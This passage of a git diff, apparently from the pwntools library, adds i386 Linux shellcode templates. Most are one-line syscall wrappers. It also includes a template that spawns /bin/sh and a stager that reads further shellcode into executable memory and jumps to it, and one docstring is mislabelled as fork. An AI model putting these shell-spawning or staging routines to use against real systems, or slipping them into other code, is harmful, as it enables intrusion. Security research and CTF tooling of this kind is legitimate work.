+%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm b/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm new file mode 100644 index 000000000..80c369fe2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setsid.asm b/pwnlib/shellcraft/templates/i386/linux/setsid.asm new file mode 100644 index 000000000..f620fa05c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm b/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm new file mode 100644 index 000000000..bb4f82063 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm @@ -0,0 +1,24 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall + from pwnlib.shellcraft.i386 import push + from pwnlib.constants import SOCK_STREAM, AF_INET, SYS_socketcall, SYS_socketcall_setsockopt +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${push(optlen)} + ${push(optval)} + ${push(optname)} + ${push(level)} + ${push(sockfd)} + ${syscall(SYS_socketcall, SYS_socketcall_setsockopt, 'esp', 0)} + diff --git a/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..8a66b2282 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.i386.linux import setsockopt + from pwnlib.shellcraft.i386 import push + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + ${push(0)} + ${push(secs)} + mov edi, esp + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'edi', 8)} + add esp, 28 diff --git a/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm b/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm new file mode 100644 index 000000000..794e70380 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setuid.asm b/pwnlib/shellcraft/templates/i386/linux/setuid.asm new file mode 100644 index 000000000..fe01101f1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sh.asm b/pwnlib/shellcraft/templates/i386/linux/sh.asm index cb9ff8570..dd542938e 100644 --- a/pwnlib/shellcraft/templates/i386/linux/sh.asm +++ b/pwnlib/shellcraft/templates/i386/linux/sh.asm @@ -1,6 +1,11 @@ <% from pwnlib.shellcraft import i386 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute a different process. -${i386.pushstr('/bin///sh')} + >>> p = run_assembly(shellcraft.i386.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' -${i386.linux.syscall('SYS_execve', 'esp', 0, 0)} + +${i386.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigaction.asm b/pwnlib/shellcraft/templates/i386/linux/sigaction.asm new file mode 100644 index 000000000..c26634f72 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm new file mode 100644 index 000000000..d42f2fce1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/i386/linux/signal.asm b/pwnlib/shellcraft/templates/i386/linux/signal.asm new file mode 100644 index 000000000..5f0dae86c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigpending.asm b/pwnlib/shellcraft/templates/i386/linux/sigpending.asm new file mode 100644 index 000000000..82f7324b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm new file mode 100644 index 000000000..3ffadad0f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm new file mode 100644 index 000000000..0469e1503 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/i386/linux/socket.asm b/pwnlib/shellcraft/templates/i386/linux/socket.asm new file mode 100644 index 000000000..45fc3787d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/socket.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft.i386.linux import socketcall %> +<% from pwnlib.constants import AF_INET, AF_INET6, SOCK_STREAM, SOCK_DGRAM, SYS_socketcall_socket %> +<% from pwnlib.util.net import sockaddr %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + address_family = {'ipv4':AF_INET,'ipv6':AF_INET6}.get(network, network) +%>\ + /* open new socket */ + ${socketcall(SYS_socketcall_socket, address_family, SOCK_STREAM, 0)} diff --git a/pwnlib/shellcraft/templates/i386/linux/socketcall.asm b/pwnlib/shellcraft/templates/i386/linux/socketcall.asm new file mode 100644 index 000000000..0c4b9a795 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/socketcall.asm @@ -0,0 +1,15 @@ +<% from pwnlib.shellcraft import common, pretty %> +<% from pwnlib.shellcraft.i386 import push %> +<% from pwnlib.shellcraft.i386.linux import syscall %> +<% from pwnlib.constants import SYS_socketcall %> + +<%page args="socketcall, socket, sockaddr, sockaddr_len"/> +<%docstring> +Invokes a socket call (e.g. socket, send, recv, shutdown) + + + /* socketcall(${pretty(socket,0)}, ${pretty(sockaddr,0)}, ${pretty(sockaddr_len,0)}) */ + ${push(sockaddr_len)} /* socklen_t addrlen */ + ${push(sockaddr)} /* sockaddr *addr */ + ${push(socket)} /* sockfd */ + ${syscall('SYS_socketcall', socketcall, 'esp')} diff --git a/pwnlib/shellcraft/templates/i386/linux/splice.asm b/pwnlib/shellcraft/templates/i386/linux/splice.asm new file mode 100644 index 000000000..cf2084813 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stage.asm b/pwnlib/shellcraft/templates/i386/linux/stage.asm new file mode 100644 index 000000000..9207aceee --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stage.asm @@ -0,0 +1,59 @@ +<% +from pwnlib.shellcraft.i386 import push +from pwnlib.shellcraft.i386.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'esp', 4)} + pop eax + push eax /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align */ + shr eax, 12 + inc eax + shl eax, 12 + + /* Map it */ + ${mmap(0, 'eax', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop ebx + push eax + + /* Read in all of the data */ + ${readn(fd, 'eax', 'ebx')} + + /* Go to shellcode */ + ret diff --git a/pwnlib/shellcraft/templates/i386/linux/stat.asm b/pwnlib/shellcraft/templates/i386/linux/stat.asm new file mode 100644 index 000000000..b9161bf5b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stat64.asm b/pwnlib/shellcraft/templates/i386/linux/stat64.asm new file mode 100644 index 000000000..2be528e1d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stime.asm b/pwnlib/shellcraft/templates/i386/linux/stime.asm new file mode 100644 index 000000000..720c58c12 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stty.asm b/pwnlib/shellcraft/templates/i386/linux/stty.asm new file mode 100644 index 000000000..e600304ab --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/i386/linux/symlink.asm b/pwnlib/shellcraft/templates/i386/linux/symlink.asm new file mode 100644 index 000000000..585c267d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm new file mode 100644 index 000000000..087345774 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sync.asm b/pwnlib/shellcraft/templates/i386/linux/sync.asm new file mode 100644 index 000000000..6765173e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm new file mode 100644 index 000000000..b995a0ad5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/syscall.asm b/pwnlib/shellcraft/templates/i386/linux/syscall.asm index 893875fde..676346c69 100644 --- a/pwnlib/shellcraft/templates/i386/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/i386/linux/syscall.asm @@ -1,5 +1,5 @@ <% - from pwnlib.shellcraft import i386 + from pwnlib.shellcraft import i386, pretty from pwnlib.constants import Constant from pwnlib.abi import linux_i386_syscall as abi %> @@ -16,20 +16,20 @@ Example: /* call execve(1, 'esp', 2, 0) */ push (SYS_execve) /* 0xb */ pop eax - push 0x1 + push 1 pop ebx mov ecx, esp - push 0x2 + push 2 pop edx xor esi, esi int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 2, 1, 0, 20).rstrip() - /* call execve(2, 1, 0, 20) */ + /* call execve(2, 1, 0, 0x14) */ push (SYS_execve) /* 0xb */ pop eax - push 0x2 + push 2 pop ebx - push 0x1 + push 1 pop ecx push 0x14 pop esi @@ -45,7 +45,7 @@ Example: >>> print pwnlib.shellcraft.i386.linux.syscall('ebp', None, None, 1).rstrip() /* call syscall('ebp', ?, ?, 1) */ mov eax, ebp - push 0x1 + push 1 pop edx int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall( @@ -53,7 +53,7 @@ Example: ... 'PROT_READ | PROT_WRITE | PROT_EXEC', ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() - /* call mmap2(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ + /* call mmap2(0, 0x1000, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ xor eax, eax mov al, 0xc0 xor ebp, ebp @@ -62,7 +62,7 @@ Example: mov ch, 0x1000 >> 8 push -1 pop edi - push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 0x7 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop edx push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop esi @@ -84,7 +84,7 @@ Example: if arg == None: args.append('?') else: - args.append(repr(arg)) + args.append(pretty(arg, False)) while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) diff --git a/pwnlib/shellcraft/templates/i386/linux/syslog.asm b/pwnlib/shellcraft/templates/i386/linux/syslog.asm new file mode 100644 index 000000000..e6f219b89 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/tee.asm b/pwnlib/shellcraft/templates/i386/linux/tee.asm new file mode 100644 index 000000000..03ed51c17 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/time.asm b/pwnlib/shellcraft/templates/i386/linux/time.asm new file mode 100644 index 000000000..3435b8536 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_create.asm b/pwnlib/shellcraft/templates/i386/linux/timer_create.asm new file mode 100644 index 000000000..dfa172e3f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm b/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm new file mode 100644 index 000000000..5975a8f7d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm new file mode 100644 index 000000000..66ee1351c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm new file mode 100644 index 000000000..ca2cf4187 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm b/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm new file mode 100644 index 000000000..6ea28bac4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/i386/linux/truncate.asm b/pwnlib/shellcraft/templates/i386/linux/truncate.asm new file mode 100644 index 000000000..723424537 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/truncate64.asm b/pwnlib/shellcraft/templates/i386/linux/truncate64.asm new file mode 100644 index 000000000..7922404d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ulimit.asm b/pwnlib/shellcraft/templates/i386/linux/ulimit.asm new file mode 100644 index 000000000..fdacb9150 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/umask.asm b/pwnlib/shellcraft/templates/i386/linux/umask.asm new file mode 100644 index 000000000..878803fce --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/i386/linux/uname.asm b/pwnlib/shellcraft/templates/i386/linux/uname.asm new file mode 100644 index 000000000..36025e8f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unlink.asm b/pwnlib/shellcraft/templates/i386/linux/unlink.asm new file mode 100644 index 000000000..5c6c92f38 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm new file mode 100644 index 000000000..c09bcc0da --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unshare.asm b/pwnlib/shellcraft/templates/i386/linux/unshare.asm new file mode 100644 index 000000000..5443ade5b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ustat.asm b/pwnlib/shellcraft/templates/i386/linux/ustat.asm new file mode 100644 index 000000000..b60712af8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/utime.asm b/pwnlib/shellcraft/templates/i386/linux/utime.asm new file mode 100644 index 000000000..b1973fa95 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/i386/linux/utimensat.asm b/pwnlib/shellcraft/templates/i386/linux/utimensat.asm new file mode 100644 index 000000000..9da2d9653 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/utimes.asm b/pwnlib/shellcraft/templates/i386/linux/utimes.asm new file mode 100644 index 000000000..bc498c12d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/vfork.asm b/pwnlib/shellcraft/templates/i386/linux/vfork.asm new file mode 100644 index 000000000..9314c4e64 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/i386/linux/vhangup.asm b/pwnlib/shellcraft/templates/i386/linux/vhangup.asm new file mode 100644 index 000000000..fbf4e711d --- /dev/null +++ 